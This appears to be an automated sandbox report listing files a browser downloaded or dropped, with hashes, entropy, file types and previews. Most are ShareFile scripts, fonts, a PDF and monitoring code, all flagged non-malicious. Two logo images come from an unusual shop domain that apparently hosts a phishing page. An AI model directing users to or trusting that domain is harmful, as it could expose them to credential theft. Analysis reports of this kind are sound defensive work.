                                                                                                                                                                                                                                                                                Preview:{"props":{"id":"pendo-base","data-layout":"lightboxBlank","class":"_pendo-step-container"},"type":"div","children":[{"css":[{"selector":"#pendo-close-guide-3d4e8aaf:hover","styles":{"color":"#D9D7D7"}},{"selector":"#pendo-close-guide-3d4e8aaf:focus","styles":{}},{"selector":"#pendo-button-1e3402c8:hover","styles":{"background":"rgba(73, 63, 185, 1)","border":"2px solid #493FB9","color":"#FFFFFF","font-weight":400}},{"selector":"div:focus","styles":{}},{"selector":"button:focus","styles":{}}],"type":"style","props":{"type":"text/css","scoped":"scoped"}},{"props":{"id":"pendo-g-qrJmWADnkufXgGqv6M-p2xBSYIU","data-vertical-alignment":"Relative to Element","data-relative-alignment":true,"style":{"z-index":300000,"position":"relative","width":"350px","animation":"none","float":"none","vertical-align":"baseline","display":"block"},"class":"_pendo-step-container-size"},"type":"div","children":[{"props":{"aria-modal":"false","tabindex":"-1","role":"dialog","id":"pendo-guide-container","data-car
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:PDF document, version 1.7
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):244654
                                                                                                                                                                                                                                                                                Entropy (8bit):7.9840077994688965
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:6144:VT0GfDd99r/72McIzOXshWrmlgW/kz+LZ0n8SjqmSkN+WkC:/Ddb/D3zO+WalgW/A+LZ0nLWlkAWkC
                                                                                                                                                                                                                                                                                MD5:1DFE4F9FEB95B0513FAAAAC475C5B58F
                                                                                                                                                                                                                                                                                SHA1:F5762EFD94E33CF307B25FE01A695B3C6597455F
                                                                                                                                                                                                                                                                                SHA-256:CFA1D463C0A47FAF192A21272DE863F361C30F4ECBDCE1DC0DAD3B3BD58DF63D
                                                                                                                                                                                                                                                                                SHA-512:F686744F7F3A5A50D235B2FC56DFFF053B92FF9582A9009F2171F4BCAC0ADF9F62F8F04AD47F967D366E283BC2894B6A95E07AD0BBB98483EB9CA21467FEE76D
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:%PDF-1.7.%......13 0 obj.<< /Linearized 1 /L 244654 /H [ 2292 187 ] /O 22 /E 242174 /N 2 /T 244370 >>.endobj... .14 0 obj.<< /Type /XRef /Filter /FlateDecode /Length 122 /W [ 1 3 1 ] /Index [ 13 35 ]. /ID [<DC45ED11E248B004AD2E1EB5BAECB6CA><41332D33362D32352D36312D35372D35>] . /Info 12 0 R . /Root 15 0 R . /Size 48 /Prev 244371 . >>.stream.x.....@.....QO.....t....).............g...`.,...<..R..I.M.H8.?...+..&..$q.x.-9e.!yI.+....A..y.d.a.l.B+.Y.._.D B.....I...endstream..endobj. .15 0 obj.<</AcroForm 19 0 R/Metadata 7 0 R/Outlines 11 0 R/Pages 10 0 R/Type/Catalog>>..endobj..16 0 obj.<</Differences[24/breve/caron/circumflex/dotaccent/hungarumlaut/ogonek/ring/tilde 39/quotesingle 96/grave 128/bullet/dagger/daggerdbl/ellipsis/emdash/endash/florin/fraction/guilsinglleft/guilsinglright/minus/perthousand/quotedblbas
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1456)
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):1492
                                                                                                                                                                                                                                                                                Entropy (8bit):5.158827164846835
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:24:r3HgrqC4ESg5CRyvC4aVHOCjxgC40ggrC6JPgC4fxL9:rG4ESD4eL40NWu45x
                                                                                                                                                                                                                                                                                MD5:F17CADE455C1E9DF4641950A02B898EC
                                                                                                                                                                                                                                                                                SHA1:416716233F1A8EA7201A7DC0F218178516CC0E37
                                                                                                                                                                                                                                                                                SHA-256:06D24BF97F48A83E5D0AA3C508620BA5BEC38AD6959626CD1BA631D1C9520914
                                                                                                                                                                                                                                                                                SHA-512:D2D557FAE36537BE89518AF4A0608FAFB4B92CAEA3CED070C2AA693EB51E606D865932823C56D90423DB8217353C9166FC77732201364AFA3F76D7DA5731C56A
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-dynamic-forms-pilet/1.25.0/package/dist/main.css
                                                                                                                                                                                                                                                                                Preview:@font-face{ascent-override:95%;font-family:PPMori;font-style:normal;font-weight:300;src:url(402b74053d26323596b3.woff2) format("woff2"),url(822249fd1980c2cf76d8.woff) format("woff")}@font-face{ascent-override:95%;font-family:PPMori;font-style:italic;font-weight:300;src:url(d539f1e6177630654d7a.woff2) format("woff2"),url(03d1fbfb34140c8b62bb.woff) format("woff")}@font-face{ascent-override:95%;font-family:PPMori;font-style:normal;font-weight:400;src:url(af15e31c70fab7cfd55c.woff2) format("woff2"),url(4d713186ee128a842a8a.woff) format("woff")}@font-face{ascent-override:95%;font-family:PPMori;font-style:italic;font-weight:400;src:url(f1e72df265e116587589.woff2) format("woff2"),url(0e2359dcf69d17da12a3.woff) format("woff")}@font-face{ascent-override:95%;font-family:PPMori;font-style:normal;font-weight:500;src:url(91306a69f84f808e9310.woff2) format("woff2"),url(6eea0c96234d4e052d5a.woff) format("woff")}@font-face{ascent-override:95%;font-family:PPMori;font-style:italic;font-weight:500;src:ur
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65473)
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):77283
                                                                                                                                                                                                                                                                                Entropy (8bit):5.226266510576525
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:768:ZvfCx1EzpGYaEO94ZOJP4Wn3jqsN5qeR6xTTo86lUxL1ohA84LijsCul3qC/pbNw:ZHrPg4QJZ3jqsN5qeY0j4Giy2GfyluH
                                                                                                                                                                                                                                                                                MD5:C555335753018971124DABD9753F7AB0
                                                                                                                                                                                                                                                                                SHA1:777ACC456CEBF8525CAFFEB55C9D72C41117907A
                                                                                                                                                                                                                                                                                SHA-256:F5EEC20D62DDE7D3BF3FA601C11AA6136CFC8C4BD01DF3BF630E6D7DD0DB9A20
                                                                                                                                                                                                                                                                                SHA-512:D46A07FBB9A7687EEFEE4409695D9816002EE85A18F85BDCA4ECB35F23F4F4B1DEAD22F41A76F82D014166851088AB77EE92FAC16F340EC092F2B939514788D8
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-conversations-pilet/1.94.6/package/dist/index.js
                                                                                                                                                                                                                                                                                Preview://@pilet v:2(webpackChunkpr_sharefiledevconversationspilet,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router","react-router-dom","tslib"],(function(t,e){var n={},r={},i={},s={},a={},o={},u={},c={};return Object.defineProperty(s,"__esModule",{value:!0}),{setters:[function(t){n.Api=t.Api,n.ItemsEntity=t.ItemsEntity,n.Uploader=t.Uploader,n.UsersEntity=t.UsersEntity,n.ZoneService=t.ZoneService,n.createFile=t.createFile},function(t){r.colorPalette=t.colorPalette,r.sizes=t.sizes},function(t){i.Avatar=t.Avatar,i.Badge=t.Badge,i.Button=t.Button,i.Flex=t.Flex,i.Form=t.Form,i.Grid=t.Grid,i.Input=t.Input,i.Skeleton=t.Skeleton,i.Spin=t.Spin,i.Typography=t.Typography,i.notification=t.notification,i.theme=t.theme},function(t){Object.keys(t).forEach((function(e){s[e]=t[e]}))},function(t){a["default"]=t["default"],a.findDOMNode=t.findDOMNode,a.flushSync=t.flushSync},function(t){o.useHistory=t.useHistory},function(t){u.Link=t.Link,u.useHistory=t
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (65453)
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):91744
                                                                                                                                                                                                                                                                                Entropy (8bit):5.35315025267453
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:1536:15K9Coppx4UK/l6XHUlMDltJXhIWDUXjak3//+nOa:15K9CoppmZ/lyLDlGonk3G
                                                                                                                                                                                                                                                                                MD5:EC10A08ABEEA396244C7C88FFAA5ECF7
                                                                                                                                                                                                                                                                                SHA1:29EA05BFC2B2A754AE77DF48FEBAC23A79352C48
                                                                                                                                                                                                                                                                                SHA-256:E4126A1DD61B9AB0EB21038540041710DDCBDCD5E03C0D7C302F74E25EF34B8E
                                                                                                                                                                                                                                                                                SHA-512:23B746B157D1DD8A2896FEDD3A86CDF13A755353FF7F9BB87A339CBE194B844B0EAEE32F038F73254BB355BEA29D02052496B28D0FB29EECA85B2CA29D343B1A
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview://@pilet v:2(webpackChunkpr_sharefiledevuseracthistpilet,{}).System.register(["antd","react","react-dom","tslib"],(function(e,t){var r={},n={},o={},i={};return Object.defineProperty(n,"__esModule",{value:!0}),{setters:[function(e){r.Alert=e.Alert,r.Button=e.Button,r.Modal=e.Modal,r.Skeleton=e.Skeleton,r.Spin=e.Spin,r.Tabs=e.Tabs,r.Tag=e.Tag},function(e){Object.keys(e).forEach((function(t){n[t]=e[t]}))},function(e){o["default"]=e["default"],o.findDOMNode=e.findDOMNode,o.flushSync=e.flushSync},function(e){i.__awaiter=e.__awaiter,i.__rest=e.__rest}],execute:function(){e((()=>{var e,s,a={5916:(e,t,r)=>{"use strict";r.d(t,{XK:()=>C,jK:()=>x});var n=r(8830),o=r.n(n),i=r(4193),s=undefined&&undefined.__assign||function(){return s=Object.assign||function(e){for(var t,r=1,n=arguments.length;r<n;r++)for(var o in t=arguments[r])Object.prototype.hasOwnProperty.call(t,o)&&(e[o]=t[o]);return e},s.apply(this,arguments)};function a(e){return Promise.resolve(o()({method:e.method,url:e.url,withCredential
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):3651
                                                                                                                                                                                                                                                                                Entropy (8bit):4.094801914706141
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:96:wO4DZ+Stb/jY+eo4hAryAes9mBYYQgWLDm9:wToSBjlevudl9nO
                                                                                                                                                                                                                                                                                MD5:EE5C8D9FB6248C938FD0DC19370E90BD
                                                                                                                                                                                                                                                                                SHA1:D01A22720918B781338B5BBF9202B241A5F99EE4
                                                                                                                                                                                                                                                                                SHA-256:04D29248EE3A13A074518C93A18D6EFC491BF1F298F9B87FC989A6AE4B9FAD7A
                                                                                                                                                                                                                                                                                SHA-512:C77215B729D0E60C97F075998E88775CD0F813B4D094DC2FDD13E5711D16F4E5993D4521D0FBD5BF7150B0DBE253D88B1B1FF60901F053113C5D7C1919852D58
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://hrv56k8ryi.ferrovelho.shop/m/mxl/mlg.svg?RHI7QEQ4V0EAB9E08G4TRBZQT
                                                                                                                                                                                                                                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0,0,1,.419-.967,1.413,1.413,0,0,1,1-.39,1.392,1.392,0,0,1,1.02.4,1.3,1.3,0,0,1,.4.958,1.248,1.248,0,0,1-.414.953,1.428,1.428,0,0,1-1.01.385A1.4,1.4,0,0,1,47.25,6.6a1.261,1.261,0,0,1-.409-.948M49.41,18.4H47.081V8.507H49.41Zm7.064-1.694a3.213,3.213,0,0,0,1.145-.241,4.811,4.811,0,0,0,1.155-.635V18a4.665,4.665,0,0,1-1.266.481,6.886,6.886,0,0,1-1.554.164,4.707,4.707,0,0,1-4.918-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.375.1v2.358a2.04,2.04,0,0,0-.
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65479)
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):226377
                                                                                                                                                                                                                                                                                Entropy (8bit):5.418095379957867
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3072:n1YhPOuYDEl23Y8rFYsXD2cpp4LvfQwRbErnOk:10PO1DEl2dZYsXD2cpp4DfQ7j3
                                                                                                                                                                                                                                                                                MD5:68B7D9CC403C9D5FF3D0C1F9EA0182C2
                                                                                                                                                                                                                                                                                SHA1:174DD1E16EB70EF76611B84A7BA30DBF0C4D0380
                                                                                                                                                                                                                                                                                SHA-256:AACFED7ED783550FAA9FCD616FB323CC101407670E0C2E4EC3F639E9534B9981
                                                                                                                                                                                                                                                                                SHA-512:FA3A4FB1AE99FF8AC1A4E5983E1186CD4BEBB904122E03AEC3FE2141F239EEB3D992D2A482488D988F77C1F911CA63DA8243DE3EBFAE65B8E6974A623E3CA07B
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview://@pilet v:2(webpackChunkpr_sharefiledevpackagepilet,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","tslib"],(function(e,t){var r={},n={},i={},o={},a={};return Object.defineProperty(i,"__esModule",{value:!0}),Object.defineProperty(o,"__esModule",{value:!0}),Object.defineProperty(a,"__esModule",{value:!0}),{setters:[function(e){r.ItemsEntity=e.ItemsEntity,r.Uploader=e.Uploader,r.UserRole=e.UserRole,r.ZoneService=e.ZoneService,r.createFile=e.createFile},function(e){n.sizes=e.sizes},function(e){Object.keys(e).forEach((function(t){i[t]=e[t]}))},function(e){Object.keys(e).forEach((function(t){o[t]=e[t]}))},function(e){Object.keys(e).forEach((function(t){a[t]=e[t]}))}],execute:function(){e((()=>{var e,s,u,c,l={80780:(e,t,r)=>{"use strict";r.d(t,{A:()=>de});var n=r(58168),i=r(64467);function o(e,t){var r=Object.keys(e);if(Object.getOwnPropertySymbols){var n=Object.getOwnPropertySymbols(e);t&&(n=n.filter((function(t){return Object.getOwnPropertyDescriptor(e,t
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):17174
                                                                                                                                                                                                                                                                                Entropy (8bit):2.9129715116732746
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                                                                                                                                                                                                MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                                                                                                                                                                                SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                                                                                                                                                                                SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                                                                                                                                                                                SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (32010)
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):50049
                                                                                                                                                                                                                                                                                Entropy (8bit):5.315307632257224
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:768:PFFeY2oE4e2HneiJbpJuAl39FVy7bT0tUpFk8Qgm:tIyreiBphl39FsvTpFvi
                                                                                                                                                                                                                                                                                MD5:63E2DF852D15AB21D7FF8FC4363222E8
                                                                                                                                                                                                                                                                                SHA1:7EE401BA652DB0A4EC960350E17216CDA01E22FB
                                                                                                                                                                                                                                                                                SHA-256:545156ADEAE44DADC82B98D504F805EBE77FB79C928EF34EED1057BB9D4CB8FE
                                                                                                                                                                                                                                                                                SHA-512:BAAD17C762461527B270B57EF294E28BEFF92B3A66829B8DDD8788A791AEBB0A40BE849BFC79FCFC5CB0D7FFC7FD709CA6CD6A61CAC878CE60F585D40F214970
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://js-agent.newrelic.com/nr-spa-1216.min.js
                                                                                                                                                                                                                                                                                Preview:!function(t,n,e){function r(e,o){if(!n[e]){if(!t[e]){var a="function"==typeof __nr_require&&__nr_require;if(!o&&a)return a(e,!0);if(i)return i(e,!0);throw new Error("Cannot find module '"+e+"'")}var s=n[e]={exports:{}};t[e][0].call(s.exports,function(n){var i=t[e][1][n];return r(i||n)},s,s.exports)}return n[e].exports}for(var i="function"==typeof __nr_require&&__nr_require,o=0;o<e.length;o++)r(e[o]);return r}({1:[function(t,n,e){var r=t(46);n.exports=function(t,n){return"addEventListener"in window?window.addEventListener(t,n,r(!1)):"attachEvent"in window?window.attachEvent("on"+t,n):void 0}},{}],2:[function(t,n,e){function r(t,n,e,r){var i=d(t,n,e);return i.stats=a(r,i.stats),i}function i(t,n,e,r,i){var a=d(t,n,e,i);return a.metrics=o(r,a.metrics),a}function o(t,n){return n||(n={count:0}),n.count+=1,v(t,function(t,e){n[t]=a(e,n[t])}),n}function a(t,n){return null==t?s(n):n?(n.c||(n=f(n.t)),n.c+=1,n.t+=t,n.sos+=t*t,t>n.max&&(n.max=t),t<n.min&&(n.min=t),n):{t:t}}function s(t){return t?t.
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):1592
                                                                                                                                                                                                                                                                                Entropy (8bit):4.205005284721148
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:48:ztSAS1OtmCtc7aIVmt4yyR9S2lKUyDWwh:RoOtmCtc7aCmVQHSRh
                                                                                                                                                                                                                                                                                MD5:4E48046CE74F4B89D45037C90576BFAC
                                                                                                                                                                                                                                                                                SHA1:4A41B3B51ED787F7B33294202DA72220C7CD2C32
                                                                                                                                                                                                                                                                                SHA-256:8E6DB1634F1812D42516778FC890010AA57F3E39914FB4803DF2C38ABBF56D93
                                                                                                                                                                                                                                                                                SHA-512:B2BBA2A68EDAA1A08CFA31ED058AFB5E6A3150AABB9A78DB9F5CCC2364186D44A015986A57707B57E2CC855FA7DA57861AD19FC4E7006C2C239C98063FE903CF
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://hrv56k8ryi.ferrovelho.shop/m/mxl/sig_op.svg
                                                                                                                                                                                                                                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><defs><style>.a{fill:none;}.b{fill:#404040;}</style></defs><rect class="a" width="48" height="48"/><path class="b" d="M40,32.578V40H32V36H28V32H24V28.766A10.689,10.689,0,0,1,19,30a10.9,10.9,0,0,1-5.547-1.5,11.106,11.106,0,0,1-2.219-1.719A11.373,11.373,0,0,1,9.5,24.547a10.4,10.4,0,0,1-1.109-2.625A11.616,11.616,0,0,1,8,19a10.9,10.9,0,0,1,1.5-5.547,11.106,11.106,0,0,1,1.719-2.219A11.373,11.373,0,0,1,13.453,9.5a10.4,10.4,0,0,1,2.625-1.109A11.616,11.616,0,0,1,19,8a10.9,10.9,0,0,1,5.547,1.5,11.106,11.106,0,0,1,2.219,1.719A11.373,11.373,0,0,1,28.5,13.453a10.4,10.4,0,0,1,1.109,2.625A11.616,11.616,0,0,1,30,19a10.015,10.015,0,0,1-.125,1.578,10.879,10.879,0,0,1-.359,1.531Zm-2,.844L27.219,22.641a14.716,14.716,0,0,0,.562-1.782A7.751,7.751,0,0,0,28,19a8.786,8.786,0,0,0-.7-3.5,8.9,8.9,0,0,0-1.938-2.859A9.269,9.269,0,0,0,22.5,10.719,8.9,8.9,0,0,0,19,10a8.786,8.786,0,0,0-3.5.7,8.9,8.9,0,0,0-2.859,1.938A9.269,9.269,0,0,0,
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65473)
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):458835
                                                                                                                                                                                                                                                                                Entropy (8bit):5.481653938855946
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:6144:aA3p1f/h6/XRAdbPWb5nAO3nUM4Eyl0r8B+x6M2V2OwIr:aAh8RAfOzJM0rqixIr
                                                                                                                                                                                                                                                                                MD5:735CBA16BF1442C21B8FA8E78AA8E83A
                                                                                                                                                                                                                                                                                SHA1:D55ED9608E0C39F5EE38494238BBEECB0A43AD04
                                                                                                                                                                                                                                                                                SHA-256:6B624BCD118EB8A238E333374B68349510FF0FEC6B843F5F46CE09A2DB176879
                                                                                                                                                                                                                                                                                SHA-512:2F36C8BDC7DA84EF5D2DD5CEECE732670CDE5D5852E8F39AC17FF529C0209FFE19A371DF664BFFCA95080546DFF485D23FBAA72AF0C01C53219221B0EEC765D0
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview://@pilet v:2(webpackChunkpr_sharefiledevnotificationcenter,{}).System.register(["@sharefiledev/antd-config","antd","react","react-dom","react-router","react-router-dom","tslib"],(function(e,t){var n={},r={},i={},o={},s={},a={},c={};return Object.defineProperty(i,"__esModule",{value:!0}),{setters:[function(e){n.colorPalette=e.colorPalette,n.sizes=e.sizes},function(e){r.Alert=e.Alert,r.Avatar=e.Avatar,r.Button=e.Button,r.Card=e.Card,r.Col=e.Col,r.Divider=e.Divider,r.Drawer=e.Drawer,r.Dropdown=e.Dropdown,r.Popover=e.Popover,r.Result=e.Result,r.Row=e.Row,r.Skeleton=e.Skeleton,r.Space=e.Space,r.Spin=e.Spin,r.Switch=e.Switch,r.Typography=e.Typography,r.notification=e.notification},function(e){Object.keys(e).forEach((function(t){i[t]=e[t]}))},function(e){o.findDOMNode=e.findDOMNode},function(e){s.useHistory=e.useHistory},function(e){a.useHistory=e.useHistory},function(e){c.__awaiter=e.__awaiter,c.__rest=e.__rest}],execute:function(){e((()=>{var e,u,l={6952:(e,t,n)=>{"use strict";n.d(t,{XK:()=
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:Web Open Font Format (Version 2), TrueType, length 36944, version 1.0
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):36944
                                                                                                                                                                                                                                                                                Entropy (8bit):7.9947025744425595
                                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                                SSDEEP:768:zLsYNN1rtkD1cWVGbIdulBn74BsQ4zAc/U66K96Nb:UorM1DkI8974GQ4Fub
                                                                                                                                                                                                                                                                                MD5:167E1CF5FED6B58439CAC0F8CBC8B112
                                                                                                                                                                                                                                                                                SHA1:6257B8DB5BE9B64AC8DF883BD15F93549BC5FD3A
                                                                                                                                                                                                                                                                                SHA-256:87A8C06A966031596415B7D116BCDAD5FC51E32B613B386491094A87A0E36714
                                                                                                                                                                                                                                                                                SHA-512:28E992A22B4A41647CF94719E23DC9BE36B30875F59E3B6A0A35650EDEA5730C3991C14F14B46C150F95B21709B72952AC5E95DCC8FB65D29AEA80D0A163BBD0
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-dynamic-forms-pilet/1.25.0/package/dist/af15e31c70fab7cfd55c.woff2
                                                                                                                                                                                                                                                                                Preview:wOF2.......P.........................................x..\.`..D.`.............6.$..T..,.. ..V..;..=[.i..:..S.j..nC.....?..r......<iC,..."t'Zd-........d..n{n.?..$.t.<.#'.....2.... ..-...r.,r..!. .rr.....t..w....e.......r..]....2)4..T.L{..'."N^(.h.f .v:7..`.8......s.......;Ft.......!.m.*.>.....S..9M.C4....)../.....S.,..Ge...'\.......i.R.......PqAII..?x.Y^......?...1(..Sm.U\L..N...V.0..N.)....Y...K[..t.R....<.......K......6.......a6....@L*.....)...{$..d...7..V..<.........@........y.V.,.}...Y..<g...=...k.!g...(..T.......bY.......v......V``.........j...E..r]?c....hQ_..w......z.....v6......%d...L...1I....oj..k.{..c...b9.......D...a{\o+r...N.(I6.$V.R....[.....-....p?.....X.n.<.(O.1nqj.A.C....5.1....g.9.n....>=.~.=....P/..E3%.2.D..'..Db(.!..?g.G.....V......lm.....HW...D..!(......w..%....-\/..B.{H.{.._k.yn....c...Do.$Q./|662Fl.r..8....wE...(A.U....9e\yx(.11nF...m.!...TD;....#.K../.....8.n......-.......Sy.&D..R.6KA.w.vQOW].9..T...C....@..
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:[]
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):426355
                                                                                                                                                                                                                                                                                Entropy (8bit):4.912224246528829
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:12288:6LKXwBc6xJun1jjpp0546TFxKnTecT7pqwrzBlRgbvO:LgBc6xJm1/pGnTLKTecTFqizHRmvO
                                                                                                                                                                                                                                                                                MD5:E05F0C0603EA36FDA2F26E329B994FE8
                                                                                                                                                                                                                                                                                SHA1:B9DF4A8E9119457CCED8B77607E98561E48ABC67
                                                                                                                                                                                                                                                                                SHA-256:E50720CEBCF4CF488A8C86EBDC38969DB72CF6BEDCB8E84405159343549CDDB1
